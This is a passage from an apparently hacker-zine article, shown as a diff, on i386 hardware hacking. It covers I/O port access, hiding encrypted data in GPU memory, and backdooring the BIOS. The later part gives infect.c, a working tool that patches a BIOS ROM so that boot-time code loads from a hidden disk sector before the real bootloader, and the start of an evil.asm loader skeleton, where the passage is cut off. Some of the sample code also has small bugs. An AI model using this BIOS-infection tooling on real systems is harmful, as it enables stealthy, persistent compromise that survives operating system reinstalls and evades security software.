+basis of hardware hacking which should be usefull to prepare for the fight
+against TCPA and other crappy things sponsored by big sucke... erm...
+"companies" such as Sony and Microsoft.
+
+     This paper is i386 centric. It does not cover any other architecture,
+but it can be used as a basis on researches about other hardware. Thus
+bear in mind that most of the material presented here won't work on any
+other machine than a PC. Subjects such as devices, BIOS and internal work
+of a PC will be discussed and some ideas about turning all these things to
+our own advantage will be presented.
+
+     This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,     
+so you won't find a fully functionnal backdoor here. The aim of the author
+is to provide information that would help you in writing your own stuff,
+not to provide you with an already done work. This subject isn't a
+particularly difficult one, all it just takes is immagination.
+
+     In order to understand this article, some knowledge about x86 assembly
+and architecture is heavily recommended. If you're a newbie to these
+subjects, I strongly recommend you to read "The Art of Assembly
+Programming" (see [1]).
+
+
+2.  A quick introduction to I/O system
+
+
+     Before digging straight into the subject, some explanations must be
+done. Those of you who already know how I/O works on Intel's and what
+they're here for might just prefer to skip to the next section. Others,
+just keep on reading. 
+
+     As this paper focuses on hardware, it would be practical to know how
+to access it. The I/O system provides such an access. As everybody knows,
+the processor (CPU) is the heart, or, more accurately, the brain of the
+computer. But the only thing it does is to compute. Basically, a CPU isn't
+of much help without devices. Devices give data to be computed to the CPU,
+and allow it to bring back an answer to our requests. The I/O system is
+used to link most of devices to the CPU. The way processors see I/O based
+devices is quite the same as the way they see memory. In fact, all the
+processors do to communicate with devices is to read and write data
+"somewhere in memory" : the I/O system is charged to handle the next steps.
+This "somewhere in memory" is represented by an I/O port. I/O ports are
+special "addresses" that connects the CPU data bus to the device. Each I/O
+based device uses at least one I/O port, many of them using several. 
+Basically, the only thing device drivers do is to manipulate I/O ports
+(well, very basically, that's what they do, just to communicate with
+hardware). The Intel Architecture provides three main ways to manipulate
+I/O ports : memory-mapped I/O, Input/Output mapped I/O and DMA.
+
+
+      memory-mapped I/O
+
+   The memory-mapped I/O system allows to manipulate I/O ports as if they
+were basic memory. Instructions such as 'mov' are used to interface with
+it. This system is simple : all it does is to map I/O ports to memory
+addresses so that when data is written/read at one of these addresses, the
+data is actually sent to/received by the device connected to the
+corresponding port. Thus, the way to communicate with a device is the same
+as communicating with memory.
+
+
+      Input/Output mapped I/O
+
+   The Input/Output mapped I/O system uses dedicated CPU instructions to
+access I/O ports. On i386, these instructions are 'in' and 'out' :
+
+       in 254, reg   ; writes content of reg register to port #254
+
+       out reg, 254  ; reads data from port #254 and stores it in reg
+
+
+    The only problem with these two instructions is that the port is
+8 bit-encoded, allowing only an access to ports 0 to 255. The sad thing is
+that this range of ports is often connected to internal hardware such as
+the system clock. The way to circomvent it is the following (taken from
+"The Art of Assembly Programming, see [1]) :
+
+To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
+address into the DX register and use DX as a pointer to the specified I/O
+address. For example, to write a byte to the I/O address $378 you would use
+an instruction sequence like the following:
+
+   mov $378, dx
+   out al, dx
+
+
+     DMA
+
+     DMA stands for Direct Memory Access. The DMA system is used to enhance
+devices to memory performances. Back in the old days, most hardware made
+use of the CPU to transfer data to and from memory. When computers started 
+to become "multimedia" (a term as meaningless as "people ready" but really 
+good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"), that is
+when computers started to come equiped with CD-ROM and sound cards, CPU
+couldn't handle tasks such as playing music while displaying a shotgun
+firing at a monster because the user just has hit the 'CTRL' key. So,
+constructors created a new chip to be able to carry out such things, and so
+was born the DMA controller. DMA allows devices to transfer data from and
+to memory with little operations done by the CPU. Basically, all the CPU
+does is to initiate the DMA transfer and then the DMA chip takes care of
+the rest, allowing the CPU to focus on other tasks. The very interesting
+thing is that since the CPU doesn't actually do the transfer and since
+devices are being used, protected mode does not interfere, which means we
+can write and read (almost) anywhere we would like to. This idea is far
+from being new, and PHC already evoqued it in one of their phrack parody.
+
+      DMA is really a powerfull system. It allows us to do very cool
+tricks but this come as the expense of a great prize : DMA is a pain in
+the ass to use as it is very hardware specific. Here follows the main
+different kinds of DMA systems :
+
+	- DMA Controller (third-party DMA) : this DMA system is really old
+and inefficient. The idea here is to have a general DMA Controller on the
+motherboard that will handle every DMA operations for every devices. This
+controller was mainly used with ISA devices and its use is now deprecated
+because of performance issues and because only 4 to 8 (depending if the
+board had two cascading DMA Controllers) DMA transfers could be setup at
+the same time (the DMA Controller only provides 4 channels).
+
+	- DMA Bus mastering (first-party DMA) : this DMA system provides
+far better performances than the DMA Controller. The idea is to allow
+each device to manage DMA himself by a processus known as "Bus Mastering".
+Instead of relying on the general DMA Controller, each device is able to
+take control of the system bus to perform its transfers, allowing hardware
+manufacturers to provide an efficient system for their devices.
+
+
+    These three things are practical enough to get started but modern
+operating systems provides medias to access I/O too. As there are a lot of
+these systems on the computer market, I'll introduce only the GNU/Linux
+system, which constitutes a perfect system to discover hardware hacking on
+Intel. As many systems, Linux is run in two modes : user land and kernel
+land. Since Kernel land already allows a good control on the system, let's
+see the user land ways to access I/O. I'll explain here two basic ways to
+play with hardware : in*(), out*() and /dev/port :
+
+
+    in/out
+
+    The in and out instructions can be used on Linux in user land. Equally,
+the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2) are
+provided to play with I/O and can be called from kernel land or user land.
+As stated in "Linux Device Drivers" (see [2]), their use is the following :
+
+    unsigned	inb(unsigned port);
+    void	outb(unsigned char byte, unsigned port);
+
+Read or write byte ports (eight bits wide). The port argument is defined as
+unsigned long for some platforms and unsigned short for others. The return
+type of inb is also different across architectures.
+
+   unsigned	inw(unsigned port);
+   void		outw(unsigned short word, unsigned port);
+
+These functions access 16-bit ports (word wide); they are not available
+when compiling for the M68k and S390 platforms, which support only byte
+I/O.
+
+   unsigned	inl(unsigned port);
+   void		outl(unsigned longword, unsigned port);
+
+These functions access 32-bit ports. longword is either declared as
+unsigned long or unsigned int, according to the platform. Like word I/O,
+"long" I/O is not available on M68k and S390.
+
+    Note that no 64-bit port I/O operations are defined. Even on 64-bit
+architectures, the port address space uses a 32-bit (maximum) data path.
+
+    The only restriction to access I/O ports this way from user land is
+that you must use iopl(2) or ioperm(2) functions, which sometimes are
+protected by security systems like grsec. And of course, you must be root.
+Here is a sample code using this way to access I/O :
+
+------[io.c
+
+/*
+** Just a simple code to see how to play with inb()/outb() functions.
+**
+** usage is :
+**	* read : io r <port address>
+**	* write : io w <port address> <value>
+**
+** compile with : gcc io.c -o io
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/io.h>	/* iopl(2) inb(2) outb(2) */
+
+
+void		read_io(long port)
+{
+  unsigned int	val;
+
+  val = inb(port);
+  fprintf(stdout, "value : %X\n", val);
+}
+
+void		write_io(long port, long value)
+{
+  outb(value, port);
+}
+
+int	main(int argc, char **argv)
+{
+  long	port;
+
+  if (argc < 3)
+    {
+      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
+      exit(1);
+    }
+  port = atoi(argv[2]);
+  if (iopl(3) == -1)
+    {
+      fprintf(stderr, "could not get permissions to I/O system\n");
+      exit(1);
+    }
+  if (!strcmp(argv[1], "r"))
+    read_io(port);
+  else if (!strcmp(argv[1], "w"))
+    write_io(port, atoi(argv[3]));
+  else
+    {
+      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
+      exit(1);
+    }
+  return 0;
+}
+
+------
+
+
+    /dev/port
+
+    /dev/port is a special file that allows you to access I/O as if you
+were manipulating a simple file. The use of the functions open(2), read(2),
+write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go
+to the address corresponding to the port with lseek() and read() or write()
+to the hardware. Here is a sample code to do it :
+
+------[port.c
+
+/*
+** Just a simple code to see how to play with /dev/port
+**
+** usage is :
+**	* read : port r <port address>
+**	* write : port w <port address> <value>
+**
+** compile with : gcc port.c -o port
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+
+void		read_port(int fd, long port)
+{
+  unsigned int	val = 0;
+
+  lseek(fd, port, SEEK_SET);
+  read(fd, &val, sizeof(char));
+  fprintf(stdout, "value : %X\n", val);
+}
+
+void		write_port(int fd, long port, long value)
+{
+  lseek(fd, port, SEEK_SET);
+  write(fd, &value, sizeof(char));
+}
+
+int	main(int argc, char **argv)
+{
+  int	fd;
+  long	port;
+
+  if (argc < 3)
+    {
+      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
+      exit(1);
+    }
+  port = atoi(argv[2]);
+  if ((fd = open("/dev/port", O_RDWR)) == -1)
+    {
+      fprintf(stderr, "could not open /dev/port\n");
+      exit(1);
+    }
+  if (!strcmp(argv[1], "r"))
+    read_port(fd, port);
+  else if (!strcmp(argv[1], "w"))
+    write_port(fd, port, atoi(argv[3]));
+  else
+    {
+      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
+      exit(1);
+    }
+  return 0;
+}
+
+
+------
+
+
+
+    Ok, one last thing before closing this introduction : for Linux users
+who want to list the I/O Ports on their system, just do a
+"cat /proc/ioports", ie:
+
+     $ cat /proc/ioports # lists ports from 0000 to FFFF
+     0000-001f : dma1
+     0020-0021 : pic1
+     0040-0043 : timer0
+     0050-0053 : timer1
+     0060-006f : keyboard
+     0080-008f : dma page reg
+     00a0-00a1 : pic2
+     00c0-00df : dma2
+     00f0-00ff : fpu
+     0170-0177 : ide1
+     01f0-01f7 : ide0
+     0213-0213 : ISAPnP
+     02f8-02ff : serial
+     0376-0376 : ide1
+     0378-037a : parport0
+     0388-0389 : OPL2/3 (left)
+     038a-038b : OPL2/3 (right)
+     03c0-03df : vga+
+     03f6-03f6 : ide0
+     03f8-03ff : serial
+     0534-0537 : CS4231
+     0a79-0a79 : isapnp write
+     0cf8-0cff : PCI conf1
+     b800-b8ff : 0000:00:0d.0
+       b800-b8ff : 8139too
+     d000-d0ff : 0000:00:09.0
+       d000-d0ff : 8139too
+     d400-d41f : 0000:00:04.2
+       d400-d41f : uhci_hcd
+     d800-d80f : 0000:00:04.1
+       d800-d807 : ide0
+       d808-d80f : ide1
+     e400-e43f : 0000:00:04.3
+       e400-e43f : motherboard
+       e400-e403 : PM1a_EVT_BLK
+       e404-e405 : PM1a_CNT_BLK
+       e408-e40b : PM_TMR
+       e40c-e40f : GPE0_BLK
+       e410-e415 : ACPI CPU throttle
+     e800-e81f : 0000:00:04.3
+       e800-e80f : motherboard
+         e800-e80f : pnp 00:02
+     $
+
+
+
+3.  Playing with GPU
+
+
+     3D cards are just GREAT, period. When you're installing such a card in
+your computer, you're not just plugging a device that can render nice
+graphics, you're also putting a mini-computer in your own computer. Today's
+graphical cards aren't a simple chip anymore. They have memory, they have a
+processor, they even have a BIOS ! You can enjoy a LOT of features from
+these little things.
+
+     First of all, let's consider what a 3D card really is. 3D cards are
+here to enhance your computer performances rendering 3D and to send output
+for your screen to display. As I said, there are three parts that interest
+us in our 3v1L doings :
+
+       1/ The Video RAM. It is memory embedded on the card. This memory is
+used to store the scene to be rendered and to store computed results. Most
+of today's cards come with more than 256 MB of memory, which provide us a
+nice place to store our stuff.
+
+       2/ The Graphical Processing Unit (shortly GPU). It constitutes the
+processor of your 3D card. Most of 3D operations are maths, so most of the
+GPU instructions compute maths designed to graphics.
+
+       3/ The BIOS. A lot of devices include today their own BIOS. 3D cards
+make no exception, and their little BIOS can be very interesting as they
+contain the firmware of your 3D card, and when you access a firmware, well,
+you can just nearly do anything you dream to do.
+
+       I'll give ideas about what we can do with these three elements, but
+first we need to know how to play with the card. Sadly, as to play with any
+device in your computer, you need the specs of your material and most 3D
+cards are not open enough to do whatever we want. But this is not a big
+problem in itself as we can use a simple API which will talk with the card
+for us. Of course, this prevents us to use tricks on the card in certain
+conditions, like in a shellcode, but once you've gained root and can do
+what pleases you to do on the system it isn't an issue anymore. The API I'm
+talking about is OpenGL (see [3]), and if you're not already familiar with
+it, I suggest you to read the tutorials on [4]. OpenGL is a 3D programming 
+API defined by the OpenGL Architecture Review Board which is composed of
+members from many of the industry's leading graphics vendors. This library
+often comes with your drivers and by using it, you can develop easily
+portable code that will use features of the present 3D card.
+
+       As we now know how to communicate with the card, let's take a deeper
+look at this hardware piece. GPU are used to transform a 3D environment
+(the "scene") given by the programmer into a 2D image (your screen).
+Basically, a GPU is a computing pipeline applying various mathematical
+operations on data. I won't introduce here the complete process of
+transforming a 3D scene into a 2D display as it is not the point of this
+paper. In our case, all you have to know is :
+
+   1/ The GPU is used to transform input (usually a 3D scene but nothing
+prevents us from inputing anything else)
+
+   2/ These transformations are done using mathematical operations commonly
+used in graphical programming (and again nothing prevents us from using
+those operations for another purpose)
+
+   3/ The pipeline is composed of two main computations each involving
+multiple steps of data transformation :
+
+	 - Transformation and Lighting : this step translates 3D objects
+	 into 2D nets of polygons (usually triangles), generating a
+	 wireframe rendering.
+
+	 - Rasterization : this step takes the wireframe rendering as input
+	 data and computes pixels values to be displayed on the screen.
+
+      So now, let's take a look at what we can do with all these features.
+What interests us here is to hide data where it would be hard to find it
+and to execute instructions outside the processor of the computer. I won't
+talk about patching 3D cards firmware as it requires heavy reverse
+engineering and as it is very specific for each card, which is not the
+subject of this paper.
+
+	First, let's consider instructions execution. Of course, as we are
+playing with a 3D card, we can't do everything we can do with a computer
+processor like triggering software interrupts, issuing I/O operations or
+manipulating memory, but we can do lots of mathematical operations. For
+example, we can encrypt and decrypt data with the 3D card's processor
+which can render the reverse engineering task quite painful. Also, it can
+speed up programs relying on heavy mathematical operations by letting the
+computer processor do other things while the 3D card computes for him. Such
+things have already been widely done. In fact, some people are already
+having fun using GPU for various purposes (see [5]). The idea here is to
+use the GPU to transform data we feed him with. GPUs provide a system to
+program them called "shaders". You can think of shaders as a programmable
+hook within the GPU which allows you to add your own routines in the data
+transformation processus. These hooks can be triggered in two places of the
+computing pipeline, depending on the shader you're using. Traditionnaly,
+shaders are used by programmers to add special effects on the rendering
+process and as the rendering process is composed of two steps, the GPU
+provides two programmable shaders. The first shader is called the
+"Vexter shader". This shader is used during the transformation and lighting
+step. The second shader is called the "Pixel shader" and this one is used
+during the rasterization processus.
+
+	  Ok, so now we have two entry points in the GPU system, but this
+doesn't tell us how to develop and inject our own routines. Again, as we
+are playing in the hardware world, there are several ways to do it,
+depending on the hardware and the system you're running on. Shaders use
+their own programming languages, some are low level assembly-like
+languages, some others are high level C-like languages. The three main
+languages used today are high level ones :
+
+      - High-Level Shader Language (HLSL) : this language is provided by
+      Microsoft's DirectX API, so you need MS Windows to use it. (see [6])
+
+      - OpenGL Shading Language (GLSL or GLSlang) : this language is
+      provided by the OpenGL API. (see [7])
+
+      - Cg : this language was introduced by NVIDIA to program on their
+      hardware using either the DirectX API or the OpenGL one. Cg comes
+      with a full toolkit distributed by NVIDIA for free (see [8] and [9]).
+
+    Now that we know how to program GPUs, let's consider the most
+interesting part : data hiding. As I said, 3D cards come with a nice
+amount of memory. Of course, this memory is aimed at graphical usage but
+nothing prevents us to store some stuff in it. In fact, with the help of
+shaders we can even ask the 3D card to store and encrypt our data. This is
+fairly easy to do : we put the data in the beginning of the pipeline, we
+program the shaders to decide how to store and encrypt it and we're done.
+Then, retrieving this data is nearly the same operation : we ask the
+shaders to decrypt it and to send it back to us. Note that this encryption
+is really weak, as we rely only on shaders' computing and as the encryption
+and decryption process can be reversed by simply looking at the shaders
+programming in your code, but this can constitutes an effective way to
+improve already existing tricks (a 3D card based Shiva could be fun).
+
+    Ok, so now we can start coding stuff taking advantage of our 3D cards.
+But wait ! We don't want to mess with shaders, we don't want to learn
+about 3D programming, we just want to execute code on the device so we can
+quickly test what we can do with those devices. Learning shaders
+programming is important because it allows to understand the device better
+but it can be really long for people unfamiliar with the 3D world.
+Recently, nVIDIA released a SDK allowing programmers to easily use 3D
+devices for other purposes than graphisms. nVIDIA CUDA (see [10]) is a SDK
+allowing programmers to use the C language with new keywords used to tell
+the compiler which part of the code should be executed on the device and
+which part of the code should be executed on the CPU. CUDA also comes with
+various mathematical libraries.
+
+     Here is a funny code to illustrate the use of CUDA :
+
+------[ 3ddb.c
+
+/*
+** 3ddb.c : a very simple program used to store an array in
+** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include <cutil.h>
+#include <cuda.h>
+
+
+/*** GPU code and data ***/
+
+char *		store;
+
+
+__global__ void	encrypt(int key)
+{
+  /* do any encryption you want here */
+  /* and put the result into 'store' */
+  /* (you need to modify CPU code if */
+  /* the encrypted text size is      */
+  /* different than the clear text   */
+  /* one). */
+}
+
+/*** end of GPU code and data ***/
+
+
+/*** CPU code and data ***/
+CUdevice	dev;
+
+void		usage(char * cmd)
+{
+  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);
+  exit(0);
+}
+
+
+void		init_gpu()
+{
+  int		count;
+
+  CUT_CHECK_DEVICE();
+  CU_SAFE_CALL(cuInit());
+  CU_SAFE_CALL(cuDeviceGetCount(&count));
+  if (count <= 0)
+    {
+      fprintf(stderr, "error : could not connect to any 3D card\n");
+      exit(-1);
+    }
+  CU_SAFE_CALL(cuDeviceGet(&dev, 0));
+  CU_SAFE_CALL(cuCtxCreate(dev));
+}
+
+
+int		main(int argc, char ** argv)
+{
+  int		key;
+  char *	res;
+
+  if (argc != 3)
+    usage(argv[0]);
+  init_gpu();
+  CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1])));
+  CUDA_SAFE_CALL(cudaMemcpy(store,
+			    argv[1],
+			    strlen(argv[1]),
+			    cudaMemcpyHostToDevice));
+  res = malloc(strlen(argv[1]));
+  key = atoi(argv[2]);
+  encrypt<<<128, 256>>>(key);
+  CUDA_SAFE_CALL(cudaMemcpy(res,
+			    store,
+			    strlen(argv[1]),
+			    cudaMemcpyDeviceToHost));
+  for (i = 0; i < strlen(argv[1]); i++)
+    printf("%c", res[i]);
+  CU_SAFE_CALL(cuCtxDetach());
+  CUT_EXIT(argc, argv);
+  return 0;
+}
+
+------
+
+
+
+4.  Playing with BIOS
+
+
+     BIOSes are very interesting. In fact, little work has already been
+done in this area and some stuff has already been published. But let's
+recap all this things and take a look at what wonderful tricks we can do
+with this little chip. First of all, BIOS means Basic Input/Output System.
+This chip is in charge of handling boot process, low-level configuration
+and of providing a set of functions for boot loaders and operating systems
+during their early loading processus. In fact, at boot time, BIOS takes
+control of the system first, then it does a couple of checks, then it sets
+an IDT to provide features via interruptions and finally tries to load the
+boot loader located in each bootable device, following its configuration.
+For example, if you specify in your BIOS setup to first try to boot on
+optical drive and then on your harddrive, at boot time the BIOS will first
+try to run an OS from the CD, then from your harddrive. BIOSes' code is the
+VERY FIRST code to be executed on your system. The interesting thing is
+that backdooring it virtually gives us a deep control of the system and a
+practical way to bypass nearly any security system running on the target,
+since we execute code even before this system starts ! But the inconvenient
+of this thing is big : as we are playing with hardware, portability becomes
+a really big issue.
+
+     The first thing you need to know about playing with BIOS is that there
+are several ways to do it. Some really good publications (see [11]) have
+been made on the subject, but I'll focus on what we can do when patching
+the ROM containing the BIOS.
+
+      BIOSes are stored in a chip located on your motherboard. Old BIOSes
+were  single ROMs without write possibilities, but then some manufacturers
+got the brilliant idea to allow BIOS patching. They introduced the BIOS
+flasher, which is a little device we can communicate with using the I/O
+system. The flasher can read and write the BIOS for us, which is all we
+need to play in this land. Of course, as there are many different BIOSes
+in the wild, I won't introduce any particular chip. Here are some pointers
+that will help you :
+
+      * [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
+It is a kernel module for Linux that creates devices to easily manipulate
+various BIOSes. It can access several BIOSes, including network card
+BIOSes. It is a nice tool to play with and the code is nice, so you'll see 
+how to get your hands to work.
+
+      * [14] is a WONDERFUL guide that will explain you nearly everything
+about Award BIOSes. This paper is a must read for anyone interested in this
+subject, even if you don't own an Award BIOS.
+
+      * [15] is an interesting website to find information about various
+BIOSes.
+
+      In order to start easy and fast, we'll use a virtual machine, which
+is very handy to test your concepts before you waste your BIOS. I
+recommend you to use Bochs (see [16]) as it is free and open source and
+mainly because it comes with a very well commented source code used to
+emulate a BIOS. But first, let's see how BIOSes really work.
+
+       As I said, BIOS is the first entity which has the control over your
+system at boottime. The interesting thing is, in order to start to reverse
+engineer your BIOS, that you don't even need to use the flasher. At the
+start of the boot process, BIOS's code is mapped (or "shadowed") in RAM at
+a specific location and uses a specific range of memory. All we have to do
+to read this code, which is 16 bits assembly, is to read memory. BIOS
+memory area starts at 0xf0000 and ends at 0x100000. An easy way to dump
+the code is to simply do a :
+
+   % dd if=/dev/mem of=BIOS.dump bs=1 count=65536 seek=983040
+   % objdump -b binary -m i8086 -D BIOS.dump
+
+   You should note that as BIOS contains data, such a dump isn't accurate
+as you will have a shift preventing code to be disassembled correctly. To
+address this problem, you should use the entry points table provided
+farther and use objdump with the '--start-address' option.
+
+      Of course, the code you see in memory is rarely easy to retrieve in
+the chip, but the fact you got the somewhat "unencrypted text" can help a
+lot. To get started to see what is interesting in this code, let's have a
+look at a very interesting comment in the Bochs BIOS source code
+(from [17]) :
+
+
+	 30 // ROM BIOS compatability entry points:
+	 31 // ===================================
+	 32 // $e05b ; POST Entry Point
+	 33 // $e2c3 ; NMI Handler Entry Point
+	 34 // $e3fe ; INT 13h Fixed Disk Services Entry Point
+	 35 // $e401 ; Fixed Disk Parameter Table
+	 36 // $e6f2 ; INT 19h Boot Load Service Entry Point
+	 37 // $e6f5 ; Configuration Data Table
+	 38 // $e729 ; Baud Rate Generator Table
+	 39 // $e739 ; INT 14h Serial Communications Service Entry Point
+	 40 // $e82e ; INT 16h Keyboard Service Entry Point
+	 41 // $e987 ; INT 09h Keyboard Service Entry Point
+	 42 // $ec59 ; INT 13h Diskette Service Entry Point
+	 43 // $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
+	 44 // $efc7 ; Diskette Controller Parameter Table
+	 45 // $efd2 ; INT 17h Printer Service Entry Point
+	 46 // $f045 ; INT 10 Functions 0-Fh Entry Point
+	 47 // $f065 ; INT 10h Video Support Service Entry Point
+	 48 // $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
+	 49 // $f841 ; INT 12h Memory Size Service Entry Point
+	 50 // $f84d ; INT 11h Equipment List Service Entry Point
+	 51 // $f859 ; INT 15h System Services Entry Point
+	 52 // $fa6e ; Character Font for 320x200 & 640x200 Graphics \
+	 (lower 128 characters)
+	 53 // $fe6e ; INT 1Ah Time-of-day Service Entry Point
+	 54 // $fea5 ; INT 08h System Timer ISR Entry Point
+	 55 // $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
+	 56 // $ff53 ; IRET Instruction for Dummy Interrupt Handler
+	 57 // $ff54 ; INT 05h Print Screen Service Entry Point
+	 58 // $fff0 ; Power-up Entry Point
+	 59 // $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
+	 60 // $fffe ; System Model ID
+
+	 These offsets indicate where to find specific BIOS
+functionalities in memory and, as they are standard, you can apply them to
+your BIOS too. For example, the BIOS interruption 19h is located in memory
+at 0xfe6f2 and its job is to load the boot loader in RAM and to jump on it.
+On old systems, a little trick was to jump to this memory location to
+reboot the system. But before considering BIOS code modification, we have
+one issue to resolve : BIOS chips have limited space, and if it can
+provide enough space for basic backdoors, we'll end up quickly begging for
+more places to store code if we want to do something nice. We have two ways
+to get more space :
+
+     1/ We patch the int19h code so that instead of loading the real
+bootloader on a device specified, it loads our code (which will load the
+real bootloader once it's done) at a specific location, like a sector
+marked as defective on a specific hard drive. Of course, this operation
+implies alteration of another media than BIOS, but, since it provides us
+with as nearly as many space as we could dream, this method must be taken
+into consideration
+
+     2/ If you absolutely want to stay in BIOS space, you can do a little
+trick on some BIOS models. One day, processors manufacturers made a deal
+with BIOS manufacturers. Processor manufacturers decided to give the
+possibility to update the CPU's microcode in order to fix bugs without
+having to recall all sold material (remember the f00f bug ?). The idea was
+that the BIOS would store the updated microcode and inject it in the CPU
+during each boot process, as modifications on microcode aren't permanent.
+This feature is known as "BIOS update". Of course, this microcode takes
+space and we can search for the code injecting it, hook it so it doesn't do
+anything anymore and erase the microcode to store our own code.
+
+
+	  Implementing 2/ is more complex than 1/, so we'll focus on the
+first one to get started. The idea is to make the BIOS load our own code
+before the bootloader. This is very easy to do. Again, BochsBIOS sources
+will come in handy, but if you look at your BIOS dump, you should see very
+little differences. The code which interests us is located at 0xfe6f2 and
+is the 19h BIOS interrupt. This one is very interesting as this is the one
+in charge of loading the boot loader. Let's take a look at the interesting 
+part of its code :
+
+       7238   // We have to boot from harddisk or floppy
+       7239   if (bootcd == 0) {
+       7240     bootseg=0x07c0;
+       7241 
+       7242 ASM_START
+       7243     push bp	
+       7244     mov  bp, sp
+       7245 
+       7246     mov  ax, #0x0000
+       7247     mov  _int19_function.status + 2[bp], ax	
+       7248     mov  dl, _int19_function.bootdrv + 2[bp]
+       7249     mov  ax, _int19_function.bootseg + 2[bp]
+       7250     mov  es, ax         ;; segment		
+       7251     mov  bx, #0x0000    ;; offset		
+       7252     mov  ah, #0x02      ;; function 2, read diskette sector
+       7253     mov  al, #0x01      ;; read 1 sector	
+       7254     mov  ch, #0x00      ;; track 0		
+       7255     mov  cl, #0x01      ;; sector 1		
+       7256     mov  dh, #0x00      ;; head 0
+       7257     int  #0x13          ;; read sector
+       7258     jnc  int19_load_done
+       7259     mov  ax, #0x0001
+       7260     mov  _int19_function.status + 2[bp], ax
+       7261 
+       7262 int19_load_done:
+       7263     pop  bp
+       7264 ASM_END
+	
+
+	int13h is the BIOS interruption used to access storage devices. In
+our case, BIOS is trying to load the boot loader, which is on the first
+sector of the drive. The interesting thing is that by only changing the
+value put in one register, we can make the BIOS load our own code. For
+instance, if we hide our code in the sector number 0xN and if we patch the
+BIOS so that instead of the instruction 'mov cl, #0x01' we have
+'mov cl, #0xN', we can have our code loaded at each boot and reboot.
+Basically, we can store our code wherever we want to as we can change the
+sector, the track and even the drive to be used. It is up to you to chose
+where to store your code but as I said, a sector marked as defective can
+work out as an interesting trick.
+
+       Here are three source codes to help you get started faster : the
+first one, inject.c, modifies the ROM of the BIOS so that it loads our code
+before the boot loader. inject.c needs /dev/bios to run. The second one,
+code.asm, is a skeletton to fill with your own code and is loaded by the
+BIOS. The third one, store.c, inject code.asm in the target sector of the
+first track of the hard drive.
+
+
+--[ infect.c
+
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#define BUFSIZE		512
+#define BIOS_DEV	"/dev/bios"
+
+#define CODE		"\xbb\x00\x00"  /* mov bx, 0 */ \
+			"\xb4\x02"      /* mov ah, 2 */ \
+			"\xb0\x01"      /* mov al, 1 */ \
+			"\xb5\x00"      /* mov ch, 0 */ \
+			"\xb6\x00"      /* mov dh, 0 */ \
+			"\xb1\x01"      /* mov cl, 1 */ \
+			"\xcd\x13"      /* int 0x13 */
+
+#define TO_PATCH	"\xcd\x13" 	 /* mov cl, 1 */
+
+#define SECTOR_OFFSET	1
+
+
+void	usage(char *cmd)
+{
+  fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);
+  exit(1);
+}
+
+
+/*
+** This function looks in the BIOS rom and search the int19h procedure.
+** The algorithm used sucks, as it does only a naive search. Interested
+** readers should change it.
+*/
+char *	search(char * buf, size_t size)
+{
+  return memmem(buf, size, CODE, sizeof(CODE));
+}
+
+
+void	patch(char * tgt, size_t size, int sector)
+{
+  char		new;
+  char *	tmp;
+
+  tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH));
+  new = (char)sector;
+  tmp[SECTOR_OFFSET] = new;
+}
+
+
+int		main(int argc, char **argv)
+{
+  int		sector;
+  size_t	i;
+  size_t	ret;
+  size_t       	cnt;
+  int		devfd;
+  int		outfd;
+  char *	buf;
+  char *	dev;
+  char *	out;
+  char *	tgt;
+
+  if (argc == 3)
+    {
+      dev = BIOS_DEV;
+      out = argv[2];
+      sector = atoi(argv[1]);
+    }
+  else if (argc == 4)
+    {
+      dev = argv[1];
+      out = argv[3];
+      sector = atoi(argv[2]);
+    }
+  else
+    usage(argv[0]);
+  if ((devfd = open(dev, O_RDONLY)) == -1)
+    {
+      fprintf(stderr, "could not open BIOS\n");
+      exit(1);
+    }
+  if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT)) == -1)
+    {
+      fprintf(stderr, "could not open %s\n", out);
+      exit(1);
+    }
+  for (cnt = 0; (ret = read(devfd, buf, BUFSIZE)) > 0; cnt += ret)
+    buf = realloc(buf, ((cnt + ret) / BUFSIZE + 1) * BUFSIZE);
+  if (ret == -1)
+    {
+      fprintf(stderr, "error reading BIOS\n");
+      exit(1);
+    }
+  if ((tgt = search(buf, cnt)) == NULL)
+    {
+      fprintf(stderr, "could not find code to patch\n");
+      exit(1);
+    }
+  patch(tgt, cnt, sector);
+  for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > 0; i += ret)
+    ;
+  if (ret == -1)
+    {
+      fprintf(stderr, "could not write patched ROM to disk\n");
+      exit(1);
+    }
+  close(devfd);
+  close(outfd);
+  free(buf);
+  return 0;
+}
+
+---
+
+
+--[ evil.asm
+
+;;; 
+;;; A sample code to be loaded by an infected BIOS instead of
+;;; the real bootloader. It basically moves himself so he can
+;;; load the real bootloader and jump on it. Replace the nops
+;;; if you want him to do something usefull.
+;;; 
+;;; usage is :
+;;;		no usage, this code must be loaded by store.c
+;;;
+;;; compile with : nasm -fbin evil.asm -o evil.bin
+;;; 
+	
+BITS	16			
+ORG	0			
+
+;; we need this label so we can check the code size
+entry:
+	
+	jmp	begin		; jump over data
+
+
+;; here comes data
+drive	db	0		; drive we're working on
+
+			
+begin:
+
+	mov	[drive], dl	; get the drive we're working on
+	
+	;; segments init
+	mov	ax, 0x07C0
+	mov	ds, ax
+	mov	es, ax
+
